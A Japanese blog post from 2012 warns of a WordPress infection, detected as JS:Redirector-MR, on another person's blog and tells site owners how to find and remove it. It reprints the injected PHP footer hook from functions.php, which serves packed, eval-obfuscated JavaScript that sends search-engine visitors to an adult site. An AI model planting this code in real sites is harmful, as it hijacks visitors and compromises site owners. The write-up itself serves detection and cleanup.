Tag: malware’

WordPressを狙ったマルウェア “JS:Redirector-MR [Trj]“

 - by Don

名前これで合ってるのかわかりませんけど…。

@yusura さんのブログ「青はココル」(あえてリンクは張りません)がマルウェアに感染していた模様です。「サイトにアクセスするとAvastがJS:Redirector-MR [Trj]というトロイの木馬の警告を出してきます」という連絡があったそうで、実際に怪しいコードが埋め込まれていました。

青はココル

青はココル

動作としては、「ページが表示された数秒後にアダルトサイトにジャンプする」ということが確認されたそうですが、他にどんな影響があるかわかりません。上記の現象を確認した場合は、念のためウイルススキャンを実行し、サイト管理者の方は自分のサイトが改竄されていないかご確認頂いた方が良さそうです。

「青はココル」は現在、下記の記事を参考に埋めこまれたスクリプトを削除した上で、メンテナンスモードになっております。

使用してるテーマのfunctions.phpの一番最後に、

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!?scounter?>';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c?)r[e(c)]=k||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c?)if(k)p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||

er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

今回はこんな文字列が埋め込まれてました
参考になさってください。
テーマの編集で削除し更新でOKでした。

おまけ

WordPressを攻撃対象としているみたいですし、このサイトもWordPressなので一応確認してみましたが、大丈夫でした。

ついでに、伺か関係でWordPressを利用していると思しきサイトを幾つか見てみました。(2012-03-25 現在)
以下のサイトは大丈夫のようです。

以下のサイトは500 Internal Server Error となっていました。まさか、PHPが改竄されて…とか考えるとちょっと心配です。(リンクは張りません)

  • アヤチノオト

参考